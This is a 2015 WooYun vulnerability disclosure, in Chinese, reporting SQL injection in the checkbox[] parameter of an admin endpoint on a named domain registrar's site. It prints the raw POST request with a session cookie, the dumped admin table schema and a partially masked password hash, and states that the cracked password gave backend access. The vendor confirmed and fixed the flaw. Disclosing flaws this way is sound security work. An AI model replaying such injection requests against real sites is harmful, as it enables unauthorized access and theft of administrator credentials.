当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135287

漏洞标题:域名商安全之时代互联某站MySQL注射可获取管理员密码(已进入后台)

相关厂商:广东时代互联科技有限公司

漏洞作者: DloveJ

提交时间:2015-08-19 14:24

修复时间:2015-09-16 09:30

公开时间:2015-09-16 09:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-16: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

厂商就不能给的高点rank哈??

详细说明:

站点http://msite.now.cn/


POST /admin.php/themes/opt HTTP/1.1
Content-Length: 74
Content-Type: application/x-www-form-urlencoded
Referer: msite.now.cn
Cookie: ci_session=hQK56MKzhpj%2BX6HusFvof2tza75uUrQnnbZUBf%2B8714zwSlXEVOpgNRMqk3uEPPMLANwP0k20Xol9Po1Sg4bx9kga7LVHgK4xxoQ7RkfbwCdf%2F7VR9hVRveBHMXyQT%2FvbGgj7RcTQO%2FYumwWpKRN61fpXWreO498lXyphAgMkhZBmU9nqcBBZoWy3j8kFqDXh83ak0gOFu26SDQ0N549Au18FM0BdXN9iRmOoMiGhz%2FOPh4U9jkIJ%2BeYObuXR3laKymygSNVhXZA6YpxRynD5ajNuJrfT1szP9wZ3mRWA%2F1fRy5n2QC8rOwd3amfgkWjht%2FwrHJtfg2ddVWJaPPRj784zSz9FebO7uwwLvruxvANC%2B0%2FNp6%2FnxPurp6BZrrrrK%2FoEU6P482z%2FApxMYMAsnsHn0DuNHyap8bNSMuEVzHVXM%2F3VpAPEhuspIH%2BdbQBq1VIjtfQjTvynyU6vh2BHA%3D%3D4a5c2c5f845f0845816ca5108d2db8a9a2e071c3
Host: msite.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
action=del_all&checkbox%5b%5d=1&chkall=check&submit=%e6%89%a7%e8%a1%8c


参数checkbox[]可注射


1.jpg


2.jpg


Database: webphone_center
Table: wp_admin
[8 columns]
+-------------+----------------------+
| Column | Type |
+-------------+----------------------+
| action_list | text |
| add_time | int(11) |
| email | varchar(60) |
| last_ip | varchar(15) |
| last_login | int(11) |
| password | varchar(32) |
| user_id | smallint(5) unsigned |
| user_name | varchar(60) |
+-------------+----------------------+


4.jpg


mask 区域
*****--------------+-*****
***** | *****
*****--------------+-*****
*****2ad5e84fc29ff99 | *****
*****--------------+-*****


3.jpg

漏洞证明:

解密后密码为

mask 区域
*****te*****


3.jpg


4.jpg


5.jpg

修复方案:

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-19 17:30

厂商回复:

谢谢提供的漏洞信息!

最新状态:

2015-09-16:已修复